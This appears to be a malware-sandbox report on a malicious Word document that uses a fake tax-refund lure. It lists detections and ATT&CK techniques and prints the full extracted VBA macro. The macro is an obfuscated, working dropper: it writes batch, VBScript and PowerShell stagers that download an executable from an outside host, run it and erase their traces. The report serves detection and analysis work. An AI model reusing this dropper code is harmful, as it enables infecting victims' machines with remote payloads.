MALICIOUS
394
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The document body presents a fake tax refund notification to trick the user into enabling macros. The Auto_Open macro, when executed, uses WScript.Shell to download a second-stage payload from 'http://gmedsport.com/plugins/xmlrpc/file.exe' and saves it to a temporary directory. The macro also attempts to establish persistence by writing to the registry.
Heuristics 14
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
retVal = Shell(ASKJD, 0) -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
USER = Environ("" + Chr(Abs(ds - 217)) + "s" & "er" & "na" & "me") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://gmedsport.com/plugins/xmlrpc/file.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15741 bytes |
SHA-256: 406182ff28dff256febabd0f5cf7029383dae7846e14a21ba4c1da1883ad04f6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
h
End Sub
Sub h()
ds = 99 + Sgn(98) + Sgn(902) + Sgn(-5)
USER = Environ("" + Chr(Abs(ds - 217)) + "s" & "er" & "na" & "me")
jks = ds
PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
BART = "" + BART2 + Chr(Abs(46)) + Chr(Abs(ds - 100 - 96 - 2)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
JSIQOJQ = BART2 + Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
BART = JSIQOJQ
MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + "" & ""
ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + ""
XPFILEDIR = "c:\Windows\Temp\" + VBTXP
TRT = "c:\Windows\Temp\" + BART
KRT = TRT
HYF = KRT
NUWHDGJS = HYF
KJSAHDFFFJ = MY_FILDIR
On Error Resume Next
SetAttr MY_FILENDIR, vbNormal
If (Len(Dir(MY_FILENDIR)) <> 0) Then
Kill MY_FILENDIR
End If
On Error Resume Next
SetAttr ASDASDSA, vbNormal
If (Dir(ASDASDSA) <> "") Then
Kill ASDASDSA
End If
On Error Resume Next
SetAttr MY_FILDIR, vbNormal
If (Dir(MY_FILDIR) <> "") Then
Kill KJSAHDFFFJ
End If
On Error Resume Next
SetAttr XPFILEDIR, vbNormal
If (Dir(XPFILEDIR) <> "") Then
Kill XPFILEDIR
End If
Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
Dim retVal As Variant
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile
FileNukk = FreeFile
FileNs = FreeFile
Kasdwq = FreeFile
FileNuG = FreeFile
Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
For Each objOperatingSystem In colOperatingSystems
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
Next
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next
winver = Val(winverstr)
WaitFor (1)
jskw = winver
If (jskw <= 5.5) Then
Open NUWHDGJS For Output As #Kasdwq
Print #Kasdwq, ""
Print #Kasdwq, "@echo off"
Print #Kasdwq, ":pinkator"
Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
LKASHDUIQWHQUDKNBWQKJDHQ = "sakdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""
Print #Kasdwq, "" & ":windows"
AIYDHLKASHDUIQWHQUDKNBWQKJDHQ = "qwe23r32sakdj sdqwlksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
WQJHLKASHDUIQWHQUDKNBWQKJDHQ = "sa3244tgfdkdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
Print #Kasdwq, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))
Print #Kasdwq, ":loop"
Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 1"
Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(33 + 1)
Print #Kasdwq, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "%tar1%" + "" & ""
Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + Chr(34) + "%tar1%" + " goto loop" + ""
Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + "" & "" + VBTXP + Chr(34) + " goto loop"
Print #Kasdwq, "exit"
Close #Kasdwq
WaitFor (2)
mttt = 88
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://gmedsport.com/plugins/xmlrpc/file" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
Print #FileNumber, "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
Print #FileNumber, "khdfu =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(khdfu)" + ""
Print #FileNumber, "" + "" & "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
JASHDJK = "send()"
Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + "" & ""
Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
Print #FileNumber, "objADOStream.Open "
Print #FileNumber, "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "End if "
Print #FileNumber, "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objS" + "hell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")" + "" & ""
Print #FileNumber, ""
Close #FileNumber
WaitFor (1)
ASKJD = TRT
retVal = Shell(ASKJD, 0)
End If
If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://gmedsport.com/plugins/xmlrpc/file" & ".e" & "x" + "e';"
Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
Print #FileNumber, "Start-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
Print #FileNumber, "$phuesHewkjelflo = 'kqwhefuihwekfaisdjhiqowhdiq';"
Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber
KJUCBHS = " = "
Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + KJUCBHS & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
Print #FileNumb, ""
Close #FileNumb
Open ASDASDSA For Output As #FileNs
Print #FileNs, "@echo off"
Print #FileNs, "ping 1.1.2.2 -n" & " 2"
Print #FileNs, "chcp 1251"
Print #FileNs, ":csakclasjdklas"
Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
Print #FileNs, "set Var4=" + Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34)
Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Var4%" + "%Var1%%Var2%%Var3%"
Print #FileNs, "exit"
Close #FileNs
SetAttr MY_FILENDIR, vbNormal
SetAttr ASDASDSA, vbNormal
SetAttr MY_FILDIR, vbNormal
WaitFor (1)
SJAKLD = ASDASDSA
retVal = Shell(SJAKLD, 0)
End If
findTest
secondTest
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "sel" & "ect>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</s" & "ele" & "ct>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub findTest()
Dim firstTerm As String
Dim secondTerm As String
Dim rrtt As Range
Dim selRange As Range
Dim selectedText As String
UYAS = ""
Set rrtt = ActiveDocument.Range
firstTerm = "" + "<" + "s" + "e" & "le" + "ct>" + UYAS + ""
secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
With rrtt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
KASHDJKAHS = "ajsdhu9qwdhu32dhkj h231ueh31e2u heh2 ue1h"
rrtt.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = rrtt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASKSASADW = "asjldklas"
rrtt.Collapse direction:=wdCollapseStart
selRange.End = rrtt.Start
selectedText = selRange.Delete
End With
End Sub
Sub secondTest()
Dim firstTerm As String
Dim secondTerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String
Set yytt = ActiveDocument.Range
SKHDAJKHASJ = "aslkdjk sadksaj ksaljd klsajd ksajd KSJDKASL JD"
firstTerm = "<" + "in" & "bo" + "x>"
secondTerm = "</" + "in" & "bo" + "x>"
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKIEJ = "ask as8d j dnkjh12kh1 sad"
yytt.Collapse direction:=wdCollapseEnd
Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{13B96CDE-FBD8-49D6-8402-4E7E97EE4945}{D0FB29D3-ED66-440C-BE73-42957E034121}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.